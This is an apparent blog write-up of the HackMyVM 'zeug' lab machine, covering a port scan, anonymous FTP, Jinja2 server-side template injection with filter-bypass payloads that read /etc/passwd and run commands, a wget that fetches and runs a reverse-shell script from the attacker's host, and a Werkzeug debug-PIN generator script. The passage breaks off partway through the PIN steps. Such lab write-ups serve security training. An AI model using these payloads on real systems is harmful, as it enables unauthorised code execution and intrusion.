{"id":471,"date":"2024-03-28T18:27:37","date_gmt":"2024-03-28T10:27:37","guid":{"rendered":"http:\/\/162.14.82.114\/?p=471"},"modified":"2024-03-30T16:15:40","modified_gmt":"2024-03-30T08:15:40","slug":"hmv-_-zeug","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/471\/03\/28\/2024\/","title":{"rendered":"hmv[-_-]zeug"},"content":{"rendered":"<h1>zeug<\/h1>\n<blockquote>\n<p>When importing the target VM, it is recommended to select the option to regenerate the MAC addresses of all network adapters.<\/p>\n<\/blockquote>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826200.png\" alt=\"image-20240328135716613\" \/><\/p>\n<h2>Information gathering<\/h2>\n<h3>Port scan<\/h3>\n<pre><code class=\"language-bash\">nmap -sCV 10.0.2.13<\/code><\/pre>\n<pre><code class=\"language-bash\">PORT     STATE SERVICE VERSION\n21\/tcp   open  ftp     vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rw-r--r--    1 0        0             109 Jan 06 23:14 README.txt\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:10.0.2.4\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain 
text\n|      At session startup, client count was 1\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n5000\/tcp open  upnp?\n| fingerprint-strings: \n|   GetRequest: \n|     HTTP\/1.1 200 OK\n|     Server: Werkzeug\/3.0.1 Python\/3.11.2\n|     Date: Thu, 28 Mar 2024 05:58:16 GMT\n|     Content-Type: text\/html; charset=utf-8\n|     Content-Length: 549\n|     Connection: close\n|     &lt;!DOCTYPE html&gt;\n|     &lt;html lang=&quot;en&quot;&gt;\n|     &lt;head&gt;\n|     &lt;meta charset=&quot;UTF-8&quot;&gt;\n|     &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n|     &lt;title&gt;Zeug&lt;\/title&gt;\n|     &lt;link rel=&quot;stylesheet&quot; type=&quot;text\/css&quot; href=&quot;\/static\/styles\/styles.css&quot;&gt;\n|     &lt;\/head&gt;\n|     &lt;body&gt;\n|     &lt;h1&gt;Zeug&lt;\/h1&gt;\n|     &lt;h3&gt;Rendering HTML templates&lt;\/h3&gt;\n|     &lt;form action=&quot;\/&quot; method=&quot;post&quot; enctype=&quot;multipart\/form-data&quot;&gt;\n|     &lt;input type=&quot;file&quot; name=&quot;file&quot; accept=&quot;.html&quot; title=&quot;Select file&quot; required&gt;\n|     &lt;input type=&quot;submit&quot; value=&quot;Upload&quot;&gt;\n|     &lt;\/form&gt;\n|     &lt;\/body&gt;\n|     &lt;\/html&gt;\n|   HTTPOptions: \n|     HTTP\/1.1 200 OK\n|     Server: Werkzeug\/3.0.1 Python\/3.11.2\n|     Date: Thu, 28 Mar 2024 05:58:31 GMT\n|     Content-Type: text\/html; charset=utf-8\n|     Allow: OPTIONS, GET, POST, HEAD\n|     Content-Length: 0\n|     Connection: close\n|   RTSPRequest: \n|     &lt;!DOCTYPE HTML&gt;\n|     &lt;html lang=&quot;en&quot;&gt;\n|     &lt;head&gt;\n|     &lt;meta charset=&quot;utf-8&quot;&gt;\n|     &lt;title&gt;Error response&lt;\/title&gt;\n|     &lt;\/head&gt;\n|     &lt;body&gt;\n|     &lt;h1&gt;Error response&lt;\/h1&gt;\n|     &lt;p&gt;Error code: 400&lt;\/p&gt;\n|     &lt;p&gt;Message: Bad request version (&#039;RTSP\/1.0&#039;).&lt;\/p&gt;\n|     &lt;p&gt;Error 
code explanation: 400 - Bad request syntax or unsupported method.&lt;\/p&gt;\n|     &lt;\/body&gt;\n|_    &lt;\/html&gt;\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port5000-TCP:V=7.94SVN%I=7%D=3\/28%Time=660506F8%P=x86_64-pc-linux-gnu%r\nSF:(GetRequest,2D3,&quot;HTTP\/1\\.1\\x20200\\x20OK\\r\\nServer:\\x20Werkzeug\/3\\.0\\.1\\\nSF:x20Python\/3\\.11\\.2\\r\\nDate:\\x20Thu,\\x2028\\x20Mar\\x202024\\x2005:58:16\\x2\nSF:0GMT\\r\\nContent-Type:\\x20text\/html;\\x20charset=utf-8\\r\\nContent-Length:\nSF:\\x20549\\r\\nConnection:\\x20close\\r\\n\\r\\n&lt;!DOCTYPE\\x20html&gt;\\n&lt;html\\x20lan\nSF:g=\\&quot;en\\&quot;&gt;\\n&lt;head&gt;\\n\\x20\\x20\\x20\\x20&lt;meta\\x20charset=\\&quot;UTF-8\\&quot;&gt;\\n\\x20\\x2\nSF:0\\x20\\x20&lt;meta\\x20name=\\&quot;viewport\\&quot;\\x20content=\\&quot;width=device-width,\\x2\nSF:0initial-scale=1\\.0\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;title&gt;Zeug&lt;\/title&gt;\\n\\x20\\x20\\x\nSF:20\\x20&lt;link\\x20rel=\\&quot;stylesheet\\&quot;\\x20type=\\&quot;text\/css\\&quot;\\x20href=\\&quot;\/stati\nSF:c\/styles\/styles\\.css\\&quot;&gt;\\n&lt;\/head&gt;\\n&lt;body&gt;\\n\\x20\\x20\\x20\\x20&lt;h1&gt;Zeug&lt;\/h1&gt;\nSF:\\n\\x20\\x20\\x20\\x20&lt;h3&gt;Rendering\\x20HTML\\x20templates&lt;\/h3&gt;\\n\\n\\x20\\x20\\x\nSF:20\\x20&lt;form\\x20action=\\&quot;\/\\&quot;\\x20method=\\&quot;post\\&quot;\\x20enctype=\\&quot;multipart\/f\nSF:orm-data\\&quot;&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;input\\x20type=\\&quot;file\\&quot;\\x2\nSF:0name=\\&quot;file\\&quot;\\x20accept=\\&quot;\\.html\\&quot;\\x20title=\\&quot;Select\\x20file\\&quot;\\x20requ\nSF:ired&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;input\\x20type=\\&quot;submit\\&quot;\\x20val\nSF:ue=\\&quot;Upload\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;\/form&gt;\\n\\n\\x20\\x20\\x20\\x20\\n\\n\\x20\\x20\nSF:\\x20\\x20\\n&lt;\/body&gt;\
\n&lt;\/html&gt;&quot;)%r(RTSPRequest,16C,&quot;&lt;!DOCTYPE\\x20HTML&gt;\\n&lt;ht\nSF:ml\\x20lang=\\&quot;en\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;head&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x2\nSF:0\\x20&lt;meta\\x20charset=\\&quot;utf-8\\&quot;&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;titl\nSF:e&gt;Error\\x20response&lt;\/title&gt;\\n\\x20\\x20\\x20\\x20&lt;\/head&gt;\\n\\x20\\x20\\x20\\x20&lt;\nSF:body&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;h1&gt;Error\\x20response&lt;\/h1&gt;\\n\\x20\nSF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;p&gt;Error\\x20code:\\x20400&lt;\/p&gt;\\n\\x20\\x20\\x20\\\nSF:x20\\x20\\x20\\x20\\x20&lt;p&gt;Message:\\x20Bad\\x20request\\x20version\\x20\\(&#039;RTSP\/\nSF:1\\.0&#039;\\)\\.&lt;\/p&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;p&gt;Error\\x20code\\x20expl\nSF:anation:\\x20400\\x20-\\x20Bad\\x20request\\x20syntax\\x20or\\x20unsupported\\x\nSF:20method\\.&lt;\/p&gt;\\n\\x20\\x20\\x20\\x20&lt;\/body&gt;\\n&lt;\/html&gt;\\n&quot;)%r(HTTPOptions,CD,&quot;\nSF:HTTP\/1\\.1\\x20200\\x20OK\\r\\nServer:\\x20Werkzeug\/3\\.0\\.1\\x20Python\/3\\.11\\.\nSF:2\\r\\nDate:\\x20Thu,\\x2028\\x20Mar\\x202024\\x2005:58:31\\x20GMT\\r\\nContent-T\nSF:ype:\\x20text\/html;\\x20charset=utf-8\\r\\nAllow:\\x20OPTIONS,\\x20GET,\\x20PO\nSF:ST,\\x20HEAD\\r\\nContent-Length:\\x200\\r\\nConnection:\\x20close\\r\\n\\r\\n&quot;);\nService Info: OS: Unix<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826204.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826204.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240328140322970\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h2>Vulnerability discovery<\/h2>\n<h3>Connecting to FTP<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ ftp 10.0.2.13\nConnected to 10.0.2.13.\n220 (vsFTPd 3.0.3)\nName (10.0.2.13:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls\n229 Entering Extended Passive Mode (|||52547|)\n150 Here comes the directory listing.\n-rw-r--r--    1 0        0             109 Jan 06 23:14 README.txt\n226 Directory send OK.\nftp&gt; get README.txt\nlocal: README.txt remote: README.txt\n229 Entering Extended Passive Mode (|||48843|)\n150 Opening BINARY mode data connection for README.txt (109 bytes).\n100% |**************************************************************************|   109        2.72 KiB\/s    00:00 ETA\n226 Transfer complete.\n109 bytes received in 00:00 (2.67 KiB\/s)<\/code><\/pre>\n<p>The contents of <code>README.txt<\/code>:<\/p>\n<pre><code class=\"language-text\">Hi, Cosette, don&#039;t forget to disable the debug mode in the web application, we don&#039;t want security breaches.<\/code><\/pre>\n<h3>Viewing the page<\/h3>\n<pre><code class=\"language-html\">&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n&lt;head&gt;\n    &lt;meta charset=&quot;UTF-8&quot;&gt;\n    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n    &lt;title&gt;Zeug&lt;\/title&gt;\n    &lt;link rel=&quot;stylesheet&quot; type=&quot;text\/css&quot; href=&quot;\/static\/styles\/styles.css&quot;&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;h1&gt;Zeug&lt;\/h1&gt;\n    &lt;h3&gt;Rendering HTML 
templates&lt;\/h3&gt;\n    &lt;form action=&quot;\/&quot; method=&quot;post&quot; enctype=&quot;multipart\/form-data&quot;&gt;\n        &lt;input type=&quot;file&quot; name=&quot;file&quot; accept=&quot;.html&quot; title=&quot;Select file&quot; required&gt;\n        &lt;input type=&quot;submit&quot; value=&quot;Upload&quot;&gt;\n    &lt;\/form&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<h3>SSTI (server-side template injection)<\/h3>\n<p>To test for template injection, upload a simple HTML file:<\/p>\n<pre><code class=\"language-html\">&lt;!DOCTYPE html&gt;\n&lt;html&gt;\n    &lt;head&gt;\n        HelloWorld!\n    &lt;\/head&gt;\n    &lt;body&gt;\n        {{9*9}}\n    &lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826205.png\" alt=\"image-20240328141531197\" \/><\/p>\n<p>It looks like template injection really is present!<\/p>\n<blockquote>\n<p><a href=\"https:\/\/swisskyrepo.github.io\/PayloadsAllTheThings\/Server%20Side%20Template%20Injection\/#jinja2-debug-statement\">https:\/\/swisskyrepo.github.io\/PayloadsAllTheThings\/Server%20Side%20Template%20Injection\/#jinja2-debug-statement<\/a><\/p>\n<\/blockquote>\n<pre><code 
class=\"language-python\">{{os.system(&#039;whoami&#039;)}}<\/code><\/pre>\n<pre><code class=\"language-text\">Error: File: \/home\/cosette\/zeug\/venv\/lib\/python3.11\/site-packages\/flask\/app.py - Template contains restricted words: os<\/code><\/pre>\n<pre><code class=\"language-python\">{{ [].class.base.subclasses() }}<\/code><\/pre>\n<pre><code class=\"language-text\">Error: File: \/home\/cosette\/zeug\/venv\/lib\/python3.11\/site-packages\/flask\/app.py - Template contains restricted words: subclasses, [, ]<\/code><\/pre>\n<pre><code class=\"language-python\">{{ self.__init__.__globals__.__builtins__ }}<\/code><\/pre>\n<pre><code class=\"language-text\">Error: File: \/home\/cosette\/zeug\/venv\/lib\/python3.11\/site-packages\/flask\/app.py - Template contains restricted words: init<\/code><\/pre>\n<pre><code class=\"language-python\">{{ get_flashed_messages.__globals__.__builtins__.open(&quot;\/etc\/passwd&quot;).read() }}<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826206.png\" alt=\"image-20240328153310165\" \/><\/p>\n<p>Two users are found: <code>cosette<\/code> and <code>exia<\/code>.<\/p>\n<h3>Method 1: template injection<\/h3>\n<p>First, list the built-in functions:<\/p>\n<pre><code 
class=\"language-python\">{{lipsum.__globals__.__builtins__}}<\/code><\/pre>\n<pre><code class=\"language-text\">&lt;html&gt; &lt;head&gt; HelloWorld! &lt;\/head&gt; &lt;body&gt; {&#039;__name__&#039;: &#039;builtins&#039;, &#039;__doc__&#039;: &quot;Built-in functions, exceptions, and other objects.\\n\\nNoteworthy: None is the `nil&#039; object; Ellipsis represents `...&#039; in slices.&quot;, &#039;__package__&#039;: &#039;&#039;, &#039;__loader__&#039;: &lt;class &#039;_frozen_importlib.BuiltinImporter&#039;&gt;, &#039;__spec__&#039;: ModuleSpec(name=&#039;builtins&#039;, loader=&lt;class &#039;_frozen_importlib.BuiltinImporter&#039;&gt;, origin=&#039;built-in&#039;), &#039;__build_class__&#039;: &lt;built-in function __build_class__&gt;, &#039;__import__&#039;: &lt;built-in function __import__&gt;, &#039;abs&#039;: &lt;built-in function abs&gt;, &#039;all&#039;: &lt;built-in function all&gt;, &#039;any&#039;: &lt;built-in function any&gt;, &#039;ascii&#039;: &lt;built-in function ascii&gt;, &#039;bin&#039;: &lt;built-in function bin&gt;, &#039;breakpoint&#039;: &lt;built-in function breakpoint&gt;, &#039;callable&#039;: &lt;built-in function callable&gt;, &#039;chr&#039;: &lt;built-in function chr&gt;, &#039;compile&#039;: &lt;built-in function compile&gt;, &#039;delattr&#039;: &lt;built-in function delattr&gt;, &#039;dir&#039;: &lt;built-in function dir&gt;, &#039;divmod&#039;: &lt;built-in function divmod&gt;, &#039;eval&#039;: &lt;built-in function eval&gt;, &#039;exec&#039;: &lt;built-in function exec&gt;, &#039;format&#039;: &lt;built-in function format&gt;, &#039;getattr&#039;: &lt;built-in function getattr&gt;, &#039;globals&#039;: &lt;built-in function globals&gt;, &#039;hasattr&#039;: &lt;built-in function hasattr&gt;, &#039;hash&#039;: &lt;built-in function hash&gt;, &#039;hex&#039;: &lt;built-in function hex&gt;, &#039;id&#039;: &lt;built-in function id&gt;, &#039;input&#039;: &lt;built-in function input&gt;, &#039;isinstance&#039;: &lt;built-in 
function isinstance&gt;, &#039;issubclass&#039;: &lt;built-in function issubclass&gt;, &#039;iter&#039;: &lt;built-in function iter&gt;, &#039;aiter&#039;: &lt;built-in function aiter&gt;, &#039;len&#039;: &lt;built-in function len&gt;, &#039;locals&#039;: &lt;built-in function locals&gt;, &#039;max&#039;: &lt;built-in function max&gt;, &#039;min&#039;: &lt;built-in function min&gt;, &#039;next&#039;: &lt;built-in function next&gt;, &#039;anext&#039;: &lt;built-in function anext&gt;, &#039;oct&#039;: &lt;built-in function oct&gt;, &#039;ord&#039;: &lt;built-in function ord&gt;, &#039;pow&#039;: &lt;built-in function pow&gt;, &#039;print&#039;: &lt;built-in function print&gt;, &#039;repr&#039;: &lt;built-in function repr&gt;, &#039;round&#039;: &lt;built-in function round&gt;, &#039;setattr&#039;: &lt;built-in function setattr&gt;, &#039;sorted&#039;: &lt;built-in function sorted&gt;, &#039;sum&#039;: &lt;built-in function sum&gt;, &#039;vars&#039;: &lt;built-in function vars&gt;, &#039;None&#039;: None, &#039;Ellipsis&#039;: Ellipsis, &#039;NotImplemented&#039;: NotImplemented, &#039;False&#039;: False, &#039;True&#039;: True, &#039;bool&#039;: &lt;class &#039;bool&#039;&gt;, &#039;memoryview&#039;: &lt;class &#039;memoryview&#039;&gt;, &#039;bytearray&#039;: &lt;class &#039;bytearray&#039;&gt;, &#039;bytes&#039;: &lt;class &#039;bytes&#039;&gt;, &#039;classmethod&#039;: &lt;class &#039;classmethod&#039;&gt;, &#039;complex&#039;: &lt;class &#039;complex&#039;&gt;, &#039;dict&#039;: &lt;class &#039;dict&#039;&gt;, &#039;enumerate&#039;: &lt;class &#039;enumerate&#039;&gt;, &#039;filter&#039;: &lt;class &#039;filter&#039;&gt;, &#039;float&#039;: &lt;class &#039;float&#039;&gt;, &#039;frozenset&#039;: &lt;class &#039;frozenset&#039;&gt;, &#039;property&#039;: &lt;class &#039;property&#039;&gt;, &#039;int&#039;: &lt;class &#039;int&#039;&gt;, &#039;list&#039;: &lt;class &#039;list&#039;&gt;, &#039;map&#039;: &lt;class &#039;map&#039;&gt;, &#039;object&#039;: &lt;class 
&#039;object&#039;&gt;, &#039;range&#039;: &lt;class &#039;range&#039;&gt;, &#039;reversed&#039;: &lt;class &#039;reversed&#039;&gt;, &#039;set&#039;: &lt;class &#039;set&#039;&gt;, &#039;slice&#039;: &lt;class &#039;slice&#039;&gt;, &#039;staticmethod&#039;: &lt;class &#039;staticmethod&#039;&gt;, &#039;str&#039;: &lt;class &#039;str&#039;&gt;, &#039;super&#039;: &lt;class &#039;super&#039;&gt;, &#039;tuple&#039;: &lt;class &#039;tuple&#039;&gt;, &#039;type&#039;: &lt;class &#039;type&#039;&gt;, &#039;zip&#039;: &lt;class &#039;zip&#039;&gt;, &#039;__debug__&#039;: True, &#039;BaseException&#039;: &lt;class &#039;BaseException&#039;&gt;, &#039;BaseExceptionGroup&#039;: &lt;class &#039;BaseExceptionGroup&#039;&gt;, &#039;Exception&#039;: &lt;class &#039;Exception&#039;&gt;, &#039;GeneratorExit&#039;: &lt;class &#039;GeneratorExit&#039;&gt;, &#039;KeyboardInterrupt&#039;: &lt;class &#039;KeyboardInterrupt&#039;&gt;, &#039;SystemExit&#039;: &lt;class &#039;SystemExit&#039;&gt;, &#039;ArithmeticError&#039;: &lt;class &#039;ArithmeticError&#039;&gt;, &#039;AssertionError&#039;: &lt;class &#039;AssertionError&#039;&gt;, &#039;AttributeError&#039;: &lt;class &#039;AttributeError&#039;&gt;, &#039;BufferError&#039;: &lt;class &#039;BufferError&#039;&gt;, &#039;EOFError&#039;: &lt;class &#039;EOFError&#039;&gt;, &#039;ImportError&#039;: &lt;class &#039;ImportError&#039;&gt;, &#039;LookupError&#039;: &lt;class &#039;LookupError&#039;&gt;, &#039;MemoryError&#039;: &lt;class &#039;MemoryError&#039;&gt;, &#039;NameError&#039;: &lt;class &#039;NameError&#039;&gt;, &#039;OSError&#039;: &lt;class &#039;OSError&#039;&gt;, &#039;ReferenceError&#039;: &lt;class &#039;ReferenceError&#039;&gt;, &#039;RuntimeError&#039;: &lt;class &#039;RuntimeError&#039;&gt;, &#039;StopAsyncIteration&#039;: &lt;class &#039;StopAsyncIteration&#039;&gt;, &#039;StopIteration&#039;: &lt;class &#039;StopIteration&#039;&gt;, &#039;SyntaxError&#039;: &lt;class &#039;SyntaxError&#039;&gt;, 
&#039;SystemError&#039;: &lt;class &#039;SystemError&#039;&gt;, &#039;TypeError&#039;: &lt;class &#039;TypeError&#039;&gt;, &#039;ValueError&#039;: &lt;class &#039;ValueError&#039;&gt;, &#039;Warning&#039;: &lt;class &#039;Warning&#039;&gt;, &#039;FloatingPointError&#039;: &lt;class &#039;FloatingPointError&#039;&gt;, &#039;OverflowError&#039;: &lt;class &#039;OverflowError&#039;&gt;, &#039;ZeroDivisionError&#039;: &lt;class &#039;ZeroDivisionError&#039;&gt;, &#039;BytesWarning&#039;: &lt;class &#039;BytesWarning&#039;&gt;, &#039;DeprecationWarning&#039;: &lt;class &#039;DeprecationWarning&#039;&gt;, &#039;EncodingWarning&#039;: &lt;class &#039;EncodingWarning&#039;&gt;, &#039;FutureWarning&#039;: &lt;class &#039;FutureWarning&#039;&gt;, &#039;ImportWarning&#039;: &lt;class &#039;ImportWarning&#039;&gt;, &#039;PendingDeprecationWarning&#039;: &lt;class &#039;PendingDeprecationWarning&#039;&gt;, &#039;ResourceWarning&#039;: &lt;class &#039;ResourceWarning&#039;&gt;, &#039;RuntimeWarning&#039;: &lt;class &#039;RuntimeWarning&#039;&gt;, &#039;SyntaxWarning&#039;: &lt;class &#039;SyntaxWarning&#039;&gt;, &#039;UnicodeWarning&#039;: &lt;class &#039;UnicodeWarning&#039;&gt;, &#039;UserWarning&#039;: &lt;class &#039;UserWarning&#039;&gt;, &#039;BlockingIOError&#039;: &lt;class &#039;BlockingIOError&#039;&gt;, &#039;ChildProcessError&#039;: &lt;class &#039;ChildProcessError&#039;&gt;, &#039;ConnectionError&#039;: &lt;class &#039;ConnectionError&#039;&gt;, &#039;FileExistsError&#039;: &lt;class &#039;FileExistsError&#039;&gt;, &#039;FileNotFoundError&#039;: &lt;class &#039;FileNotFoundError&#039;&gt;, &#039;InterruptedError&#039;: &lt;class &#039;InterruptedError&#039;&gt;, &#039;IsADirectoryError&#039;: &lt;class &#039;IsADirectoryError&#039;&gt;, &#039;NotADirectoryError&#039;: &lt;class &#039;NotADirectoryError&#039;&gt;, &#039;PermissionError&#039;: &lt;class &#039;PermissionError&#039;&gt;, &#039;ProcessLookupError&#039;: &lt;class &#039;ProcessLookupError&#039;&gt;, 
&#039;TimeoutError&#039;: &lt;class &#039;TimeoutError&#039;&gt;, &#039;IndentationError&#039;: &lt;class &#039;IndentationError&#039;&gt;, &#039;IndexError&#039;: &lt;class &#039;IndexError&#039;&gt;, &#039;KeyError&#039;: &lt;class &#039;KeyError&#039;&gt;, &#039;ModuleNotFoundError&#039;: &lt;class &#039;ModuleNotFoundError&#039;&gt;, &#039;NotImplementedError&#039;: &lt;class &#039;NotImplementedError&#039;&gt;, &#039;RecursionError&#039;: &lt;class &#039;RecursionError&#039;&gt;, &#039;UnboundLocalError&#039;: &lt;class &#039;UnboundLocalError&#039;&gt;, &#039;UnicodeError&#039;: &lt;class &#039;UnicodeError&#039;&gt;, &#039;BrokenPipeError&#039;: &lt;class &#039;BrokenPipeError&#039;&gt;, &#039;ConnectionAbortedError&#039;: &lt;class &#039;ConnectionAbortedError&#039;&gt;, &#039;ConnectionRefusedError&#039;: &lt;class &#039;ConnectionRefusedError&#039;&gt;, &#039;ConnectionResetError&#039;: &lt;class &#039;ConnectionResetError&#039;&gt;, &#039;TabError&#039;: &lt;class &#039;TabError&#039;&gt;, &#039;UnicodeDecodeError&#039;: &lt;class &#039;UnicodeDecodeError&#039;&gt;, &#039;UnicodeEncodeError&#039;: &lt;class &#039;UnicodeEncodeError&#039;&gt;, &#039;UnicodeTranslateError&#039;: &lt;class &#039;UnicodeTranslateError&#039;&gt;, &#039;ExceptionGroup&#039;: &lt;class &#039;ExceptionGroup&#039;&gt;, &#039;EnvironmentError&#039;: &lt;class &#039;OSError&#039;&gt;, &#039;IOError&#039;: &lt;class &#039;OSError&#039;&gt;, &#039;open&#039;: &lt;built-in function open&gt;, &#039;quit&#039;: Use quit() or Ctrl-D (i.e. EOF) to exit, &#039;exit&#039;: Use exit() or Ctrl-D (i.e. EOF) to exit, &#039;copyright&#039;: Copyright (c) 2001-2023 Python Software Foundation. All Rights Reserved. Copyright (c) 2000 BeOpen.com. All Rights Reserved. Copyright (c) 1995-2001 Corporation for National Research Initiatives. All Rights Reserved. Copyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam. 
All Rights Reserved., &#039;credits&#039;: Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands for supporting Python development. See www.python.org for more information., &#039;license&#039;: Type license() to see the full license text, &#039;help&#039;: Type help() for interactive help, or help(object) for help about object.} &lt;\/body&gt; &lt;\/html&gt;<\/code><\/pre>\n<p>Check the current user name:<\/p>\n<pre><code class=\"language-python\">{{lipsum.__globals__.__builtins__.eval(&quot;__im&quot;&quot;port__(&#039;o&#039;&#039;s&#039;).pop&quot;&quot;en(&#039;whoami&#039;).read()&quot;)}}<\/code><\/pre>\n<pre><code class=\"language-text\">&lt;html&gt; &lt;head&gt; HelloWorld! &lt;\/head&gt; &lt;body&gt; cosette &lt;\/body&gt; &lt;\/html&gt;<\/code><\/pre>\n<p>Try uploading a reverse shell script:<\/p>\n<pre><code class=\"language-python\">{{lipsum.__globals__.__builtins__.eval(&quot;__im&quot;&quot;port__(&#039;o&#039;&#039;s&#039;).pop&quot;&quot;en(&#039;wget http:\/\/10.0.2.4:8888\/rev.sh&#039;).read()&quot;)}}<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826207.png\" alt=\"image-20240328160430291\" \/><\/p>\n<p>Now execute it:<\/p>\n<pre><code 
class=\"language-bash\">{{lipsum.__globals__.__builtins__.eval(&quot;__im&quot;&quot;port__(&#039;o&#039;&#039;s&#039;).pop&quot;&quot;en(&#039;bash rev.sh&#039;).read()&quot;)}}<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826208.png\" alt=\"image-20240328160917535\" \/><\/p>\n<p>Got a shell!<\/p>\n<h3>Method 2: cracking the PIN<\/h3>\n<p>I had to disconnect here because something came up; after rebooting I switched to bridged networking so I could work from my own machine, which does not affect anything.<\/p>\n<p>Because <code>debug<\/code> is enabled, we can access the <code>console<\/code>, but it requires a PIN.<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403281826209.png\" alt=\"image-20240328155306443\" \/><\/p>\n<p>This PIN has a known weakness and can be recovered: <a href=\"https:\/\/github.com\/wdahlenburg\/werkzeug-debug-console-bypass\">https:\/\/github.com\/wdahlenburg\/werkzeug-debug-console-bypass<\/a><\/p>\n<pre><code class=\"language-python\"># get_pin.py\nimport hashlib\nfrom itertools import chain\n\n# Values Werkzeug mixes into the PIN; each one must match the target exactly\nprobably_public_bits = [\n    &#039;user&#039;,                                                  # username the Flask app runs as\n    &#039;flask.app&#039;,                                             # module name of the app object\n    &#039;Flask&#039;,                                                 # class name of the app object\n    &#039;\/usr\/local\/lib\/python3.5\/dist-packages\/flask\/app.py&#039;    # absolute path of flask\/app.py on the target\n]\n\nprivate_bits = [\n    &#039;279275995014060&#039;,                    # MAC address of the target, as a decimal integer\n    &#039;d4e6cb65d59544f3331ea0425dc555a1&#039;    # machine id (\/etc\/machine-id plus the cgroup suffix)\n]\n\nh = hashlib.sha1() # or hashlib.md5() on older Werkzeug versions\nfor bit in chain(probably_public_bits, private_bits):\n    if not bit:\n        continue\n    if isinstance(bit, str):\n        bit = bit.encode(&#039;utf-8&#039;)\n    h.update(bit)\nh.update(b&#039;cookiesalt&#039;)\n#h.update(b&#039;shittysalt&#039;)\n\ncookie_name = &#039;__wzd&#039; + h.hexdigest()[:20]\n\nnum = None\nif num is None:\n    h.update(b&#039;pinsalt&#039;)\n    num = (&#039;%09d&#039; % int(h.hexdigest(), 16))[:9]\n\nrv = None\nif rv is None:\n    for group_size in 5, 4, 3:\n        if len(num) % group_size == 0:\n            rv = &#039;-&#039;.join(num[x:x + group_size].rjust(group_size, &#039;0&#039;)\n                          for x in range(0, len(num), group_size))\n            break\n    else:\n        rv = num\n\nprint(rv)<\/code><\/pre>\n<p>We need to change four places:<\/p>\n<pre><code class=\"language-python\">probably_public_bits = [\n    &#039;user&#039;,                                                           # 1\n    &#039;flask.app&#039;,                                                  \n    
&#039;Flask&#039;,                                                      \n    &#039;\/usr\/local\/lib\/python3.5\/dist-packages\/flask\/app.py&#039;         # 2\n]\n\nprivate_bits = [\n    &#039;279275995014060&#039;,                                                # 3 \n    &#039;d4e6cb65d59544f3331ea0425dc555a1&#039;                                # 4\n]<\/code><\/pre>\n<h4>Username<\/h4>\n<p>One of the earlier error messages was:<\/p>\n<pre><code class=\"language-text\">Error: File: \/home\/cosette\/zeug\/venv\/lib\/python3.11\/site-packages\/flask\/app.py - Template contains restricted words: init<\/code><\/pre>\n<p>So the username is clearly <code>cosette<\/code>.<\/p>\n<h4>Path of app.py<\/h4>\n<p><code>\/home\/cosette\/zeug\/venv\/lib\/python3.11\/site-packages\/flask\/app.py<\/code><\/p>\n<h4>MAC address<\/h4>\n<p>Item <code>#3<\/code> is the MAC address of the target, written as a decimal integer. Mine is <code>08:00:27:25:b4:6c<\/code>; just convert the 